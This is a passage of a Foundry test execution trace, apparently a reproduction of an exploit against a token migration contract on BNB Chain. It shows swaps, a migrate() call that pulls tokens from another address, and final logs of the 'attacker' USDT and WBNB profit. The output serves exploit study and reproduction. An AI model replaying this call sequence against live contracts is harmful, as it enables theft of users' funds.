    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 1046510410166 [1.046e12]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3452] 0xC632F90affeC7121120275610BF17Df9963F181c::transfer(0x559D0deAcAD259d970f65bE611f93fCCD1C44261, 952380953380 [9.523e11])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x559D0deAcAD259d970f65bE611f93fCCD1C44261, value: 952380953380 [9.523e11])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb67e781ce0699bf3d15023f516e44e299b58227f797bc14c180690a2bdd06f46: 0x000000000000000000000000000000000000000000000000000002f8ffc0883a → 0x000000000000000000000000000000000000000000000000000003d6be149b5e
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000000000f3a8e199b6 → 0x00000000000000000000000000000000000000000000000000000015ea8d8692
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122df174364a7e4 → 0x0000000000000000000000000000000000000000000000000122e16bf11aaf10
    │   │   │   @ 0xd0bc96a89373c8d4ef86c40f26c2b5e34416bedbdde38e0fb127affdc080b2ff: 0x000000000000000000000000000000000000000000000000000000055465c9e7 → 0x000000000000000000000000000000000000000000000000000000f3a8e2669f
    │   │   │   @ 12: 0 → 1
    │   │   └─ ← [Stop]
    │   ├─ [952] 0x169f715CaE1F94C203366a6890053E817C767B7C::balanceOf(0x559D0deAcAD259d970f65bE611f93fCCD1C44261) [staticcall]
    │   │   └─ ← [Return] 10213388531131332 [1.021e16]
    │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0x559D0deAcAD259d970f65bE611f93fCCD1C44261) [staticcall]
    │   │   └─ ← [Return] 4220846906206 [4.22e12]
    │   ├─ emit Sync(reserve0: 10213388531131332 [1.021e16], reserve1: 4220846906206 [4.22e12])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 952380953380 [9.523e11], amount0Out: 0, amount1Out: 950000000000 [9.5e11], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 8: 0x63974a9e000000000000000003d6302a243a00000000000000244905d359e3c4 → 0x63974a9e000000000000000003d6be149b5e00000000000000244905d359e3c4
    │   └─ ← [Stop]
    ├─ [35050] 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb::migrate()
    │   ├─ [34658] 0x67d7249D581169516E49a88eEC11370234100fb7::migrate() [delegatecall]
    │   │   ├─ [541] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 171457072245114 [1.714e14]
    │   │   ├─ [567] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::isExcludedFromFee(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [14474] 0xC2319E87280c64e2557a51Cb324713Dd8d1410a3::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, 155870065677375 [1.558e14])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 3117401313546 [3.117e12])
    │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, value: 155870065677375 [1.558e14])
    │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, value: 115792089237316195423570985008687907853269984665640564039457583690779637057470 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000009bf075e2a97a → 9
    │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000122e3c09f0dbf3c → 0x0000000000000000000000000000000000000000000000000122e96c463fe150
    │   │   │   │   @ 0x0c5721b8db9ed51b5c9177db1d78d104e9b344d9db0765a58d46d6a160cb75a3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffff6d54eeb95bfd → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffedf919ad407be
    │   │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x0000000000000000000000000000000000000000000000000122e3c09f0dbf3c → 0x0000000000000000000000000000000000000000000000000122e96c463fe150
    │   │   │   │   @ 0xce4f19a36083186070d62ff6541ab5ac20afe318455fe329c78073dc19769c95: 0x0000000000000000000000000000000000000000000000052c5542901aa5332d → 0x0000000000000000000000000000000000000000000000052c55d0536e8a876c
    │   │   │   │   @ 4: 0x0000000000000000000000000000000000000000000000052f3725b81a321f67 → 0x0000000000000000000000000000000000000000000000052f3722e246990e5d
    │   │   │   └─ ← [Return] true
    │   │   ├─ [4640] 0x169f715CaE1F94C203366a6890053E817C767B7C::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 171457072245114 [1.714e14])
    │   │   │   ├─ emit Transfer(from: 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 171457072245114 [1.714e14])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xce4f19a36083186070d62ff6541ab5ac20afe318455fe329c78073dc19769c95: 0x00000000000000000000000000000000000000000000000000c7e7b6b522583b → 0x00000000000000000000000000000000000000000000000000c74bc63f3faec1
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000000001c651cbd655 → 0x00000000000000000000000000000000000000000000000000009db6c7ae7fcf
    │   │   │   └─ ← [Return] true
    │   │   ├─ [7673] 0x169f715CaE1F94C203366a6890053E817C767B7C::transferFrom(0x077D12657826369A01638500229205995F78e206, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 17145707224511 [1.714e13])
    │   │   │   ├─ emit Approval(owner: 0x077D12657826369A01638500229205995F78e206, spender: 0xE445654F3797c5Ee36406dBe88FBAA0DfbdDB2Bb, value: 95465262987594575513 [9.546e19])
    │   │   │   ├─ emit Transfer(from: 0x077D12657826369A01638500229205995F78e206, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 17145707224511 [1.714e13])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000009db6c7ae7fcf → 0x0000000000000000000000000000000000000000000000000000ad4ed3785d8e
    │   │   │   │   @ 0xb8a259052f5632b7b078ae321f2fc650a2e51e73926d4b154c9d0a98349eafbb: 0x0000000000000000000000000000000000000000000000052cd8ce7c089c0c58 → 0x0000000000000000000000000000000000000000000000052cd8bee3fcd22e99
    │   │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000220480143a4ff14 → 0x0000000000000000000000000000000000000000000000000220386937db2155
    │   │   │   └─ ← [Return] true
    │   │   ├─  storage changes:
    │   │   │   @ 0x0c5721b8db9ed51b5c9177db1d78d104e9b344d9db0765a58d46d6a160cb75a3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffff6d54eeb95bfd → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffedf919ad407be
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000000001c651cbd655 → 0x00000000000000000000000000000000000000000000000000009db6c7ae7fcf
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [952] 0x169f715CaE1F94C203366a6890053E817C767B7C::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 190554066935182 [1.905e14]
    ├─ [48397] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(171498660241663 [1.714e14], 0, [0x169f715CaE1F94C203366a6890053E817C767B7C, 0xC632F90affeC7121120275610BF17Df9963F181c], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1670859422 [1.67e9])
    │   ├─ [19223] 0x169f715CaE1F94C203366a6890053E817C767B7C::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x559D0deAcAD259d970f65bE611f93fCCD1C44261, 171498660241663 [1.714e14])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xAE85A0d7406e83436A9d0753c8F9Fe1fcbb6FcD8, value: 6859946409664 [6.859e12])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x077D12657826369A01638500229205995F78e206, value: 6859946409664 [6.859e12])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0000000000000000000000000000000000000000, value: 3429973204832 [3.429e12])
    │   │   ├─ emit Fee(param0: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 17149866024160 [1.714e13])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x559D0deAcAD259d970f65bE611f93fCCD1C44261, value: 171498660241663 [1.714e14])
    │   │   ├─  storage changes:
    │   │   │   @ 0xc678ed214d6d421e6d0e866d942d5a0d0296c1791eb3815c227c395df082923c: 0x000000000000000000000000000000000000000000000004c38748b5ad1d983e → 0x000000000000000000000000000000000000000000000004c3874ef2e1c8d6fe
    │   │   │   @ 3: 0x0000000000000000000000000000000000000000000000052fc03df026485b01 → 0x0000000000000000000000000000000000000000000000052fc03ad18bf2bba1
    │   │   │   @ 0xb67e781ce0699bf3d15023f516e44e299b58227f797bc14c180690a2bdd06f46: 0x00000000000000000000000000000000000000000000000000244905d359e3c4 → 0x0000000000000000000000000000000000000000000000000024e4fff81304c3
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000000ad4ed3785d8e → 0x000000000000000000000000000000000000000000000000000001bbab131faf
    │   │   │   @ 0x56495ac27b01787915bba718445fb8592f3cb239eae41fd1106a61327ccc7726: 0x0000000000000000000000000000000000000000000000000220386937db2155 → 0x00000000000000000000000000000000000000000000000002203ea66c866015
    │   │   └─ ← [Return] true
    │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 94129456786 [9.412e10]
    │   ├─ [893] 0x559D0deAcAD259d970f65bE611f93fCCD1C44261::getReserves() [staticcall]
    │   │   └─ ← [Return] 10213388531131332 [1.021e16], 4220846906206 [4.22e12], 1670859422 [1.67e9]
    │   ├─ [952] 0x169f715CaE1F94C203366a6890053E817C767B7C::balanceOf(0x559D0deAcAD259d970f65bE611f93fCCD1C44261) [staticcall]
    │   │   └─ ← [Return] 10384887191372995 [1.038e16]
    │   ├─ [19017] 0x559D0deAcAD259d970f65bE611f93fCCD1C44261::swap(0, 69532746398 [6.953e10], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [3452] 0xC632F90affeC7121120275610BF17Df9963F181c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 69532746398 [6.953e10])
    │   │   │   ├─ emit Transfer(from: 0x559D0deAcAD259d970f65bE611f93fCCD1C44261, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 69532746398 [6.953e10])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000000000000015ea8d8692 → 0x000000000000000000000000000000000000000000000000000000261b070930
    │   │   │   │   @ 0xb67e781ce0699bf3d15023f516e44e299b58227f797bc14c180690a2bdd06f46: 0x000000000000000000000000000000000000000000000000000003d6be149b5e → 0x000000000000000000000000000000000000000000000000000003c68d9b18c0
    │   │   │   └─ ← [Return] true
    │   │   ├─ [952] 0x169f715CaE1F94C203366a6890053E817C767B7C::balanceOf(0x559D0deAcAD259d970f65bE611f93fCCD1C44261) [staticcall]
    │   │   │   └─ ← [Return] 10384887191372995 [1.038e16]
    │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0x559D0deAcAD259d970f65bE611f93fCCD1C44261) [staticcall]
    │   │   │   └─ ← [Return] 4151314159808 [4.151e12]
    │   │   ├─ emit Sync(reserve0: 10384887191372995 [1.038e16], reserve1: 4151314159808 [4.151e12])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 171498660241663 [1.714e14], amount1In: 0, amount0Out: 0, amount1Out: 69532746398 [6.953e10], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0x63974a9e000000000000000003d6be149b5e00000000000000244905d359e3c4 → 0x63974a9e000000000000000003c68d9b18c00000000000000024e4fff81304c3
    │   │   └─ ← [Stop]
    │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 163662203184 [1.636e11]
    │   └─ ← [Stop]
    ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 163662203184 [1.636e11]
    ├─ [92203] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(163662203184 [1.636e11], 0, [0xC632F90affeC7121120275610BF17Df9963F181c, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1670859422 [1.67e9])
    │   ├─ [11072] 0xC632F90affeC7121120275610BF17Df9963F181c::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xBE46815E0F0123ad626B82A0166eaa32274104f5, 163662203184 [1.636e11])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xBE46815E0F0123ad626B82A0166eaa32274104f5, value: 163662203184 [1.636e11])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007749467436751 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xebfbff063e1437745e49311302607346ba23b06ac7b7eb87ba2df1f3f7cdb1a0: 0x00000000000000000000000000000000000000000000000000002339c274dc49 → 0x0000000000000000000000000000000000000000000000000000235fdd7be579
    │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffd9e4f8f6cf
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000000000261b070930 → 0
    │   │   └─ ← [Return] true
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 0
    │   ├─ [2893] 0xBE46815E0F0123ad626B82A0166eaa32274104f5::getReserves() [staticcall]
    │   │   └─ ← [Return] 4303507559445956771661155 [4.303e24], 38730982546505 [3.873e13], 1670859395 [1.67e9]
    │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0xBE46815E0F0123ad626B82A0166eaa32274104f5) [staticcall]
    │   │   └─ ← [Return] 38894644749689 [3.889e13]
    │   ├─ [62399] 0xBE46815E0F0123ad626B82A0166eaa32274104f5::swap(18063363736130073638413 [1.806e22], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [27971] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 18063363736130073638413 [1.806e22])
    │   │   │   ├─ emit Transfer(from: 0xBE46815E0F0123ad626B82A0166eaa32274104f5, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 18063363736130073638413 [1.806e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xebfbff063e1437745e49311302607346ba23b06ac7b7eb87ba2df1f3f7cdb1a0: 0x000000000000000000000000000000000000000000038f4d9cbd43d7bad34563 → 0x000000000000000000000000000000000000000000038b7a6535d5a298f38f56
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000003d337876e3521dfb60d
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xBE46815E0F0123ad626B82A0166eaa32274104f5) [staticcall]
    │   │   │   └─ ← [Return] 4285444195709826698022742 [4.285e24]
    │   │   ├─ [585] 0xC632F90affeC7121120275610BF17Df9963F181c::balanceOf(0xBE46815E0F0123ad626B82A0166eaa32274104f5) [staticcall]
    │   │   │   └─ ← [Return] 38894644749689 [3.889e13]
    │   │   ├─ emit Sync(reserve0: 4285444195709826698022742 [4.285e24], reserve1: 38894644749689 [3.889e13])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 163662203184 [1.636e11], amount0Out: 18063363736130073638413 [1.806e22], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 10: 0x000000000000000000001ecd6aa654be0fc9e6acce28c4015b807a53d8cbb0e9 → 0x000000000000000000001ecd6d60d5613dc94123fd215d1771fbc3e18a026023
    │   │   │   @ 9: 0x000000000000000000000000000000000000000653f6506cd09d18201ea69d72 → 0x000000000000000000000000000000000000000653f75b9a3346160006d6df55
    │   │   │   @ 8: 0x63974a8300000000000000002339c274dc49000000038f4d9cbd43d7bad34563 → 0x63974a9e0000000000000000235fdd7be579000000038b7a6535d5a298f38f56
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 18063363736130073638413 [1.806e22]
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 18063363736130073638413 [1.806e22]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker USDT balance after exploit", val: 18063363736130073638413 [1.806e22], decimals: 18)
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 8795805412983842275 [8.795e18]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WBNB balance after exploit", val: 8795805412983842275 [8.795e18], decimals: 18)
    ├─  storage changes:
    │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000000000a155c6341ad1 → 0x0000000000000000000000000000000000000000000000000000ad4ed3785d8e
    │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    │   @ 12: 0 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 22.55s (20.90s CPU time)

Ran 2 test suites in 23.73s (23.12s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
